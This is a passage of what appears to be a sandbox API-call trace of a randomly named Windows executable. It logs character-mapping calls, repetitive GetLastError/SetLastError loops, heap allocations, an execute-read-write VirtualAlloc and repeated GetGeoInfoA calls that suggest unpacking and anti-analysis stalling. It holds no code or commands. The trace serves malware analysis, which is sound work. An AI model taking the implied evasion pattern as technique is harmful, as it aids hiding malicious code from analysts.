\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鮆웶㣓AĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0055.610] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鮆웶㣓AĀ", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0055.610] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿG\x05\x8bÙ\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0055.610] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4b78e0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OqRoSnESYXcDITEx.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\oqrosnesyxcditex.exe")) returned 0x3a [0055.610] GetLastError () returned 0x0 [0055.610] SetLastError (dwErrCode=0x0) [0055.611] GetLastError () returned 0x0 [0055.611] SetLastError (dwErrCode=0x0) [0055.611] GetLastError () returned 0x0 [0055.611] SetLastError (dwErrCode=0x0) [0055.611] GetLastError () returned 0x0 [0055.611] SetLastError (dwErrCode=0x0) [0055.611] GetLastError () returned 0x0 [0055.611] SetLastError (dwErrCode=0x0) [0055.611] GetLastError () returned 0x0 [0055.611] SetLastError (dwErrCode=0x0) [0055.611] GetLastError () returned 0x0 [0055.611] SetLastError (dwErrCode=0x0) [0055.611] GetLastError () returned 0x0 [0055.611] SetLastError (dwErrCode=0x0) [0055.611] GetLastError () returned 0x0 [0055.611] SetLastError (dwErrCode=0x0) [0055.611] GetLastError () returned 0x0 [0055.611] SetLastError (dwErrCode=0x0) [0055.612] GetLastError () returned 0x0 [0055.612] SetLastError (dwErrCode=0x0) [0055.612] GetLastError () returned 0x0 [0055.612] SetLastError (dwErrCode=0x0) [0055.612] GetLastError () returned 0x0 [0055.612] SetLastError (dwErrCode=0x0) [0055.612] GetLastError () returned 0x0 [0055.612] SetLastError (dwErrCode=0x0) [0055.612] GetLastError () returned 0x0 [0055.612] SetLastError (dwErrCode=0x0) [0055.612] GetLastError () returned 0x0 [0055.612] SetLastError (dwErrCode=0x0) [0055.612] GetLastError () returned 0x0 [0055.612] SetLastError (dwErrCode=0x0) [0055.612] GetLastError () returned 0x0 [0055.612] SetLastError (dwErrCode=0x0) [0055.612] GetLastError () returned 0x0 [0055.612] SetLastError (dwErrCode=0x0) [0055.612] GetLastError () returned 0x0 [0055.613] SetLastError (dwErrCode=0x0) [0055.613] GetLastError () returned 0x0 [0055.613] SetLastError (dwErrCode=0x0) [0055.613] GetLastError () returned 0x0 [0055.613] SetLastError (dwErrCode=0x0) [0055.613] GetLastError () returned 0x0 [0055.613] SetLastError (dwErrCode=0x0) [0055.613] GetLastError () returned 0x0 [0055.613] SetLastError (dwErrCode=0x0) [0055.613] GetLastError () returned 0x0 [0055.613] SetLastError (dwErrCode=0x0) [0055.613] GetLastError () returned 0x0 [0055.613] SetLastError (dwErrCode=0x0) [0055.613] GetLastError () returned 0x0 [0055.613] SetLastError (dwErrCode=0x0) [0055.613] GetLastError () returned 0x0 [0055.613] SetLastError (dwErrCode=0x0) [0055.613] GetLastError () returned 0x0 [0055.614] SetLastError (dwErrCode=0x0) [0055.614] GetLastError () returned 0x0 [0055.614] SetLastError (dwErrCode=0x0) [0055.614] GetLastError () returned 0x0 [0055.614] SetLastError (dwErrCode=0x0) [0055.614] GetLastError () returned 0x0 [0055.614] SetLastError (dwErrCode=0x0) [0055.614] GetLastError () returned 0x0 [0055.614] SetLastError (dwErrCode=0x0) [0055.614] GetLastError () returned 0x0 [0055.614] SetLastError (dwErrCode=0x0) [0055.614] GetLastError () returned 0x0 [0055.614] SetLastError (dwErrCode=0x0) [0055.614] GetLastError () returned 0x0 [0055.614] SetLastError (dwErrCode=0x0) [0055.614] GetLastError () returned 0x0 [0055.614] SetLastError (dwErrCode=0x0) [0055.614] GetLastError () returned 0x0 [0055.615] SetLastError (dwErrCode=0x0) [0055.615] GetLastError () returned 0x0 [0055.615] SetLastError (dwErrCode=0x0) [0055.615] GetLastError () returned 0x0 [0055.615] SetLastError (dwErrCode=0x0) [0055.615] GetLastError () returned 0x0 [0055.615] SetLastError (dwErrCode=0x0) [0055.615] GetLastError () returned 0x0 [0055.615] SetLastError (dwErrCode=0x0) [0055.615] GetLastError () returned 0x0 [0055.615] SetLastError (dwErrCode=0x0) [0055.615] GetLastError () returned 0x0 [0055.615] SetLastError (dwErrCode=0x0) [0055.615] GetLastError () returned 0x0 [0055.615] SetLastError (dwErrCode=0x0) [0055.615] GetLastError () returned 0x0 [0055.615] SetLastError (dwErrCode=0x0) [0055.615] GetLastError () returned 0x0 [0055.615] SetLastError (dwErrCode=0x0) [0055.616] GetLastError () returned 0x0 [0055.616] SetLastError (dwErrCode=0x0) [0055.616] GetLastError () returned 0x0 [0055.616] SetLastError (dwErrCode=0x0) [0055.616] GetLastError () returned 0x0 [0055.616] SetLastError (dwErrCode=0x0) [0055.616] GetLastError () returned 0x0 [0055.616] SetLastError (dwErrCode=0x0) [0055.616] GetLastError () returned 0x0 [0055.616] SetLastError (dwErrCode=0x0) [0055.616] GetLastError () returned 0x0 [0055.616] SetLastError (dwErrCode=0x0) [0055.616] GetLastError () returned 0x0 [0055.616] SetLastError (dwErrCode=0x0) [0055.616] GetLastError () returned 0x0 [0055.616] SetLastError (dwErrCode=0x0) [0055.616] GetLastError () returned 0x0 [0055.616] SetLastError (dwErrCode=0x0) [0055.616] GetLastError () returned 0x0 [0055.617] SetLastError (dwErrCode=0x0) [0055.617] GetLastError () returned 0x0 [0055.617] SetLastError (dwErrCode=0x0) [0055.617] GetLastError () returned 0x0 [0055.617] SetLastError (dwErrCode=0x0) [0055.617] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x0, Size=0x43) returned 0x61e1990 [0055.617] GetLastError () returned 0x0 [0055.617] SetLastError (dwErrCode=0x0) [0055.617] GetLastError () returned 0x0 [0055.617] SetLastError (dwErrCode=0x0) [0055.617] GetLastError () returned 0x0 [0055.617] SetLastError (dwErrCode=0x0) [0055.617] GetLastError () returned 0x0 [0055.617] SetLastError (dwErrCode=0x0) [0055.617] GetLastError () returned 0x0 [0055.617] SetLastError (dwErrCode=0x0) [0055.617] GetLastError () returned 0x0 [0055.617] SetLastError (dwErrCode=0x0) [0055.617] GetLastError () returned 0x0 [0055.618] SetLastError (dwErrCode=0x0) [0055.618] GetLastError () returned 0x0 [0055.618] SetLastError (dwErrCode=0x0) [0055.618] GetLastError () returned 0x0 [0055.618] SetLastError (dwErrCode=0x0) [0055.618] GetLastError () returned 0x0 [0055.618] SetLastError (dwErrCode=0x0) [0055.618] GetLastError () returned 0x0 [0055.618] SetLastError (dwErrCode=0x0) [0055.618] GetLastError () returned 0x0 [0055.618] SetLastError (dwErrCode=0x0) [0055.618] GetLastError () returned 0x0 [0055.618] SetLastError (dwErrCode=0x0) [0055.618] GetLastError () returned 0x0 [0055.618] SetLastError (dwErrCode=0x0) [0055.618] GetLastError () returned 0x0 [0055.618] SetLastError (dwErrCode=0x0) [0055.618] GetLastError () returned 0x0 [0055.618] SetLastError (dwErrCode=0x0) [0055.619] GetLastError () returned 0x0 [0055.619] SetLastError (dwErrCode=0x0) [0055.619] GetLastError () returned 0x0 [0055.619] SetLastError (dwErrCode=0x0) [0055.619] GetLastError () returned 0x0 [0055.619] SetLastError (dwErrCode=0x0) [0055.619] GetLastError () returned 0x0 [0055.619] SetLastError (dwErrCode=0x0) [0055.619] GetLastError () returned 0x0 [0055.619] SetLastError (dwErrCode=0x0) [0055.619] GetLastError () returned 0x0 [0055.619] SetLastError (dwErrCode=0x0) [0055.619] GetLastError () returned 0x0 [0055.619] SetLastError (dwErrCode=0x0) [0055.619] GetLastError () returned 0x0 [0055.619] SetLastError (dwErrCode=0x0) [0055.619] GetLastError () returned 0x0 [0055.619] SetLastError (dwErrCode=0x0) [0055.620] GetLastError () returned 0x0 [0055.620] SetLastError (dwErrCode=0x0) [0055.620] GetLastError () returned 0x0 [0055.620] SetLastError (dwErrCode=0x0) [0055.620] GetLastError () returned 0x0 [0055.620] SetLastError (dwErrCode=0x0) [0055.620] GetLastError () returned 0x0 [0055.620] SetLastError (dwErrCode=0x0) [0055.620] GetLastError () returned 0x0 [0055.620] SetLastError (dwErrCode=0x0) [0055.620] GetLastError () returned 0x0 [0055.620] SetLastError (dwErrCode=0x0) [0055.620] GetLastError () returned 0x0 [0055.620] SetLastError (dwErrCode=0x0) [0055.620] GetLastError () returned 0x0 [0055.620] SetLastError (dwErrCode=0x0) [0055.620] GetLastError () returned 0x0 [0055.620] SetLastError (dwErrCode=0x0) [0055.620] GetLastError () returned 0x0 [0055.621] SetLastError (dwErrCode=0x0) [0055.621] GetLastError () returned 0x0 [0055.621] SetLastError (dwErrCode=0x0) [0055.621] GetLastError () returned 0x0 [0055.621] SetLastError (dwErrCode=0x0) [0055.621] GetLastError () returned 0x0 [0055.621] SetLastError (dwErrCode=0x0) [0055.621] GetLastError () returned 0x0 [0055.621] SetLastError (dwErrCode=0x0) [0055.621] GetLastError () returned 0x0 [0055.621] SetLastError (dwErrCode=0x0) [0055.621] GetLastError () returned 0x0 [0055.621] SetLastError (dwErrCode=0x0) [0055.621] GetLastError () returned 0x0 [0055.621] SetLastError (dwErrCode=0x0) [0055.621] GetLastError () returned 0x0 [0055.621] SetLastError (dwErrCode=0x0) [0055.621] GetLastError () returned 0x0 [0055.621] SetLastError (dwErrCode=0x0) [0055.621] GetLastError () returned 0x0 [0055.622] SetLastError (dwErrCode=0x0) [0055.622] GetLastError () returned 0x0 [0055.622] SetLastError (dwErrCode=0x0) [0055.622] GetLastError () returned 0x0 [0055.622] SetLastError (dwErrCode=0x0) [0055.622] GetLastError () returned 0x0 [0055.622] SetLastError (dwErrCode=0x0) [0055.622] GetLastError () returned 0x0 [0055.622] SetLastError (dwErrCode=0x0) [0055.622] GetLastError () returned 0x0 [0055.622] SetLastError (dwErrCode=0x0) [0055.622] GetLastError () returned 0x0 [0055.622] SetLastError (dwErrCode=0x0) [0055.622] GetLastError () returned 0x0 [0055.622] SetLastError (dwErrCode=0x0) [0055.622] GetLastError () returned 0x0 [0055.622] SetLastError (dwErrCode=0x0) [0055.622] GetLastError () returned 0x0 [0055.623] SetLastError (dwErrCode=0x0) [0055.623] GetLastError () returned 0x0 [0055.623] SetLastError (dwErrCode=0x0) [0055.623] GetLastError () returned 0x0 [0055.623] SetLastError (dwErrCode=0x0) [0055.623] GetLastError () returned 0x0 [0055.623] SetLastError (dwErrCode=0x0) [0055.623] GetLastError () returned 0x0 [0055.623] SetLastError (dwErrCode=0x0) [0055.623] GetLastError () returned 0x0 [0055.623] SetLastError (dwErrCode=0x0) [0055.623] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x98) returned 0x61e19e0 [0055.623] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x1f) returned 0x61e1a80 [0055.623] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x36) returned 0x61e1aa8 [0055.623] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x37) returned 0x61e1ae8 [0055.623] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x3c) returned 0x61e1b28 [0055.623] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x31) returned 0x61e1b70 [0055.623] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x17) returned 0x61e1bb0 [0055.623] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x24) returned 0x61e1bd0 [0055.623] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x14) returned 0x61e1c00 [0055.623] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0xd) returned 0x61e1c20 [0055.623] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x25) returned 0x61e1c38 [0055.624] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x39) returned 0x61e1c68 [0055.624] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x18) returned 0x61e1cb0 [0055.624] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x17) returned 0x61e1cd0 [0055.624] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0xe) returned 0x61e1cf0 [0055.624] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x69) returned 0x61e1d08 [0055.624] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x3e) returned 0x61e1d80 [0055.624] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x1b) returned 0x61e1dc8 [0055.624] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x1d) returned 0x61e1df0 [0055.624] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x48) returned 0x61e1e18 [0055.624] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x12) returned 0x61e1e68 [0055.624] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x18) returned 0x61e1e88 [0055.624] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x1b) returned 0x61e1ea8 [0055.624] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x24) returned 0x61e1ed0 [0055.624] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x29) returned 0x61e1f00 [0055.624] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x1e) returned 0x61e1f38 [0055.624] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x41) returned 0x61e1f60 [0055.624] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x17) returned 0x61e1fb0 [0055.624] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0xf) returned 0x61e1fd0 [0055.624] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x16) returned 0x61e1fe8 [0055.624] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x2a) returned 0x61e2008 [0055.624] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x29) returned 0x61e2040 [0055.624] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x15) returned 0x61e2078 [0055.624] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x1e) returned 0x61e2098 [0055.624] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x2a) returned 0x61e20c0 [0055.625] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x12) returned 0x61e20f8 [0055.625] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x18) returned 0x61e2118 [0055.625] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x46) returned 0x61e2138 [0055.625] HeapFree (in: hHeap=0x61e0000, dwFlags=0x0, lpMem=0x61e11f8 | out: hHeap=0x61e0000) returned 1 [0055.625] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76d30000 [0055.625] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0055.625] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0055.626] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x800) returned 0x61e2188 [0055.626] RtlAllocateHeap (HeapHandle=0x61e0000, Flags=0x8, Size=0x80) returned 0x61e11f8 [0055.626] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4096ac) returned 0x0 [0055.629] RtlSizeHeap (HeapHandle=0x61e0000, Flags=0x0, MemoryPointer=0x61e11f8) returned 0x80 [0055.629] GetLastError () returned 0x0 [0055.629] SetLastError (dwErrCode=0x0) [0055.629] GetLastError () returned 0x0 [0055.629] SetLastError (dwErrCode=0x0) [0055.629] GetLastError () returned 0x0 [0055.629] SetLastError (dwErrCode=0x0) [0055.629] GetLastError () returned 0x0 [0055.629] SetLastError (dwErrCode=0x0) [0055.629] GetLastError () returned 0x0 [0055.630] SetLastError (dwErrCode=0x0) [0055.630] GetLastError () returned 0x0 [0055.630] SetLastError (dwErrCode=0x0) [0055.630] GetLastError () returned 0x0 [0055.630] SetLastError (dwErrCode=0x0) [0055.630] GetLastError () returned 0x0 [0055.630] SetLastError (dwErrCode=0x0) [0055.630] GetLastError () returned 0x0 [0055.630] SetLastError (dwErrCode=0x0) [0055.630] GetLastError () returned 0x0 [0055.630] SetLastError (dwErrCode=0x0) [0055.630] GetLastError () returned 0x0 [0055.630] SetLastError (dwErrCode=0x0) [0055.630] GetLastError () returned 0x0 [0055.630] SetLastError (dwErrCode=0x0) [0055.630] GetLastError () returned 0x0 [0055.630] SetLastError (dwErrCode=0x0) [0055.630] GetLastError () returned 0x0 [0055.630] SetLastError (dwErrCode=0x0) [0055.630] GetLastError () returned 0x0 [0055.631] SetLastError (dwErrCode=0x0) [0055.631] GetLastError () returned 0x0 [0055.631] SetLastError (dwErrCode=0x0) [0055.631] GetLastError () returned 0x0 [0055.631] SetLastError (dwErrCode=0x0) [0055.631] GetLastError () returned 0x0 [0055.631] SetLastError (dwErrCode=0x0) [0055.631] GetLastError () returned 0x0 [0055.631] SetLastError (dwErrCode=0x0) [0055.631] GetLastError () returned 0x0 [0055.631] SetLastError (dwErrCode=0x0) [0055.631] GetLastError () returned 0x0 [0055.631] SetLastError (dwErrCode=0x0) [0055.631] GetLastError () returned 0x0 [0055.631] SetLastError (dwErrCode=0x0) [0055.631] GetLastError () returned 0x0 [0055.631] SetLastError (dwErrCode=0x0) [0055.631] GetLastError () returned 0x0 [0055.632] SetLastError (dwErrCode=0x0) [0055.632] GetLastError () returned 0x0 [0055.632] SetLastError (dwErrCode=0x0) [0055.632] GetLastError () returned 0x0 [0055.632] SetLastError (dwErrCode=0x0) [0055.632] GetLastError () returned 0x0 [0055.632] SetLastError (dwErrCode=0x0) [0055.632] GetLastError () returned 0x0 [0055.632] SetLastError (dwErrCode=0x0) [0055.632] GetLastError () returned 0x0 [0055.632] SetLastError (dwErrCode=0x0) [0055.632] GetLastError () returned 0x0 [0055.632] SetLastError (dwErrCode=0x0) [0055.632] GetLastError () returned 0x0 [0055.632] SetLastError (dwErrCode=0x0) [0055.632] GetLastError () returned 0x0 [0055.632] SetLastError (dwErrCode=0x0) [0055.632] GetLastError () returned 0x0 [0055.632] SetLastError (dwErrCode=0x0) [0055.632] GetLastError () returned 0x0 [0055.633] SetLastError (dwErrCode=0x0) [0055.633] GetLastError () returned 0x0 [0055.633] SetLastError (dwErrCode=0x0) [0055.633] GetLastError () returned 0x0 [0055.633] SetLastError (dwErrCode=0x0) [0055.633] GetLastError () returned 0x0 [0055.633] SetLastError (dwErrCode=0x0) [0055.633] GetLastError () returned 0x0 [0055.633] SetLastError (dwErrCode=0x0) [0055.633] GetLastError () returned 0x0 [0055.633] SetLastError (dwErrCode=0x0) [0055.633] GetLastError () returned 0x0 [0055.633] SetLastError (dwErrCode=0x0) [0055.633] GetLastError () returned 0x0 [0055.633] SetLastError (dwErrCode=0x0) [0055.633] GetLastError () returned 0x0 [0055.633] SetLastError (dwErrCode=0x0) [0055.633] GetLastError () returned 0x0 [0055.633] SetLastError (dwErrCode=0x0) [0055.634] GetLastError () returned 0x0 [0055.634] SetLastError (dwErrCode=0x0) [0055.634] GetLastError () returned 0x0 [0055.634] SetLastError (dwErrCode=0x0) [0055.634] GetLastError () returned 0x0 [0055.634] SetLastError (dwErrCode=0x0) [0055.634] GetLastError () returned 0x0 [0055.634] SetLastError (dwErrCode=0x0) [0055.634] GetLastError () returned 0x0 [0055.634] SetLastError (dwErrCode=0x0) [0055.634] GetLastError () returned 0x0 [0055.634] SetLastError (dwErrCode=0x0) [0055.634] GetLastError () returned 0x0 [0055.634] SetLastError (dwErrCode=0x0) [0055.634] GetLastError () returned 0x0 [0055.634] SetLastError (dwErrCode=0x0) [0055.634] GetLastError () returned 0x0 [0055.634] SetLastError (dwErrCode=0x0) [0055.634] GetLastError () returned 0x0 [0055.635] SetLastError (dwErrCode=0x0) [0055.635] GetLastError () returned 0x0 [0055.635] SetLastError (dwErrCode=0x0) [0055.635] GetLastError () returned 0x0 [0055.635] SetLastError (dwErrCode=0x0) [0055.635] GetLastError () returned 0x0 [0055.636] SetLastError (dwErrCode=0x0) [0055.636] GetLastError () returned 0x0 [0055.636] SetLastError (dwErrCode=0x0) [0055.636] GetLastError () returned 0x0 [0055.636] SetLastError (dwErrCode=0x0) [0055.636] GetLastError () returned 0x0 [0055.636] SetLastError (dwErrCode=0x0) [0055.636] GetLastError () returned 0x0 [0055.636] SetLastError (dwErrCode=0x0) [0055.638] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0055.638] lstrlenA (lpString="") returned 0 [0055.638] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0055.639] VirtualAlloc (lpAddress=0x0, dwSize=0x90d50, flAllocationType=0x1000, flProtect=0x40) returned 0x240000 [0055.644] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.646] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.646] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.646] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.646] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.646] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.646] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.646] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.646] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.646] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.646] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.646] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.646] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.646] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.646] GetGeoInfoA (in: Location=0x0, GeoType=0x0, lpGeoData=0x0, cchData=0, LangId=0x0 | out: lpGeoData=0x0) returned 0 [0055.646] 